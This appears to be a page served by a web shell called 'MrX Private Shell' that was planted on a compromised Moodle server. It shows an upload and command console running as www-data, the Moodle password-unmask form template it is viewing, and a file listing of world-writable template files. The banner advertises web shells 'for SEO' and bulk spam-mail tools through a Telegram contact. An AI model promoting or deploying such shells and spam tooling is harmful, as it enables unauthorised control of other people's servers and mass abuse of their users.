__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
{{!
    This file is part of Moodle - http://moodle.org/

    Moodle is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    Moodle is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
}}
{{!
    @template core_form/element-passwordunmask

    Moodle passwordunmask form element template.

    The purpose of this template is to render a passwordunmask form element.

    Classes required for JS:
    * none

    Data attributes required for JS:
    * none

    Context variables required for this template:
    * element
        * id
        * name
        * value
        * size

    Example context (json):
    {
        "element": {
            "id": "example_password_unmask",
            "name": "example",
            "value": "Password1!",
            "size": 40
        }
    }

}}
{{< core_form/element-template }}
    {{$ element }}
        <div data-passwordunmask="wrapper" data-passwordunmaskid="{{ element.id }}">
            <div class="d-flex align-items-center">
                <span data-passwordunmask="editor">
                    <input  type="password"
                            {{# element.frozen }}readonly{{/ element.frozen }}
                            {{^ element.hardfrozen}} name="{{ element.name }}"{{/ element.hardfrozen }}
                            id="{{ element.id }}"
                            value="{{ element.value }}"
                            class="form-control d-none {{# error }}is-invalid{{/ error }}"
                            data-size="{{ element.size }}"
                            {{# error }}
                                autofocus aria-describedby="{{ element.iderror }}"
                            {{/ error }}
                            {{#required}}
                                aria-required="true"
                            {{/required}}
                            {{{ element.attributes }}}
                            >
                </span>
                {{^ element.frozen }}
                <a href="#" class="form-control" data-passwordunmask="edit" title="{{ edithint }}">
                {{/ element.frozen }}
                    <span data-passwordunmask="displayvalue">{{> core_form/element-passwordunmask-fill }}</span>
                {{^ element.frozen }}
                    {{# pix }} t/passwordunmask-edit, core, {{# str }} passwordunmaskedithint, form {{/ str }}{{/ pix }}
                </a>
                {{/ element.frozen }}
                <a href="#" class="btn btn-link icon-no-margin p-1 ms-1" data-passwordunmask="unmask" title="{{ unmaskhint }}">
                    {{# pix }} t/passwordunmask-reveal, core, {{# str }} passwordunmaskrevealhint, form {{/ str }}{{/ pix }}
                </a>
            </div>
            <span data-passwordunmask="instructions" class="form-text text-muted" style="display: none;">
                {{^ element.frozen }}
                {{# str }} passwordunmaskinstructions, form {{/ str }}
                {{/ element.frozen }}
            </span>
        </div>
    {{/ element }}
{{/ core_form/element-template }}
{{#js}}
require(['core_form/passwordunmask'], function(PasswordUnmask) {
    new PasswordUnmask("{{ element.id }}");
});
{{/ js }}

Filemanager

Name Type Size Permission Actions
collapsesections.mustache File 1.29 KB 0777
editor_textarea.mustache File 1.67 KB 0777
element-advcheckbox-inline.mustache File 1.36 KB 0777
element-advcheckbox.mustache File 2.8 KB 0777
element-autocomplete-inline.mustache File 1.82 KB 0777
element-autocomplete.mustache File 1.8 KB 0777
element-button-inline.mustache File 746 B 0777
element-button.mustache File 720 B 0777
element-checkbox-inline.mustache File 1.28 KB 0777
element-checkbox.mustache File 2.7 KB 0777
element-choicedropdown.mustache File 5.23 KB 0777
element-date_selector-inline.mustache File 307 B 0777
element-date_selector.mustache File 482 B 0777
element-date_time_selector-inline.mustache File 320 B 0777
element-date_time_selector.mustache File 490 B 0777
element-defaultcustom-inline.mustache File 1.36 KB 0777
element-defaultcustom.mustache File 1.62 KB 0777
element-duration-inline.mustache File 271 B 0777
element-duration.mustache File 31 B 0777
element-editor-inline.mustache File 143 B 0777
element-editor.mustache File 129 B 0777
element-filemanager.mustache File 835 B 0777
element-filepicker.mustache File 833 B 0777
element-filetypes.mustache File 31 B 0777
element-grading.mustache File 129 B 0777
element-group-inline.mustache File 292 B 0777
element-group.mustache File 1.44 KB 0777
element-header.mustache File 2.42 KB 0777
element-modgrade.mustache File 31 B 0777
element-modvisible.mustache File 32 B 0777
element-password-inline.mustache File 1.79 KB 0777
element-password.mustache File 1.76 KB 0777
element-passwordunmask-fill.mustache File 1.62 KB 0777
element-passwordunmask.mustache File 3.62 KB 0777
element-questioncategory-inline.mustache File 45 B 0777
element-questioncategory.mustache File 38 B 0777
element-radio-inline.mustache File 1.29 KB 0777
element-radio.mustache File 2.63 KB 0777
element-recaptcha.mustache File 129 B 0777
element-select-inline.mustache File 1.52 KB 0777
element-select.mustache File 4.51 KB 0777
element-selectgroups-inline.mustache File 1.21 KB 0777
element-selectgroups.mustache File 1.28 KB 0777
element-selectwithlink.mustache File 1.11 KB 0777
element-selectyesno-inline.mustache File 39 B 0777
element-selectyesno.mustache File 32 B 0777
element-static.mustache File 1.65 KB 0777
element-submit-inline.mustache File 1009 B 0777
element-submit.mustache File 1.14 KB 0777
element-tags-inline.mustache File 1.74 KB 0777
element-tags.mustache File 1.73 KB 0777
element-template-inline.mustache File 819 B 0777
element-template.mustache File 3 KB 0777
element-text-inline.mustache File 740 B 0777
element-text.mustache File 792 B 0777
element-textarea.mustache File 663 B 0777
element-url.mustache File 2.32 KB 0777
element-warning.mustache File 128 B 0777
element-wikieditor.mustache File 129 B 0777
filetypes-browser.mustache File 4.25 KB 0777
filetypes-descriptions.mustache File 1.72 KB 0777
filetypes-trigger.mustache File 1.39 KB 0777
setting_validation_failure.mustache File 1.17 KB 0777
Filemanager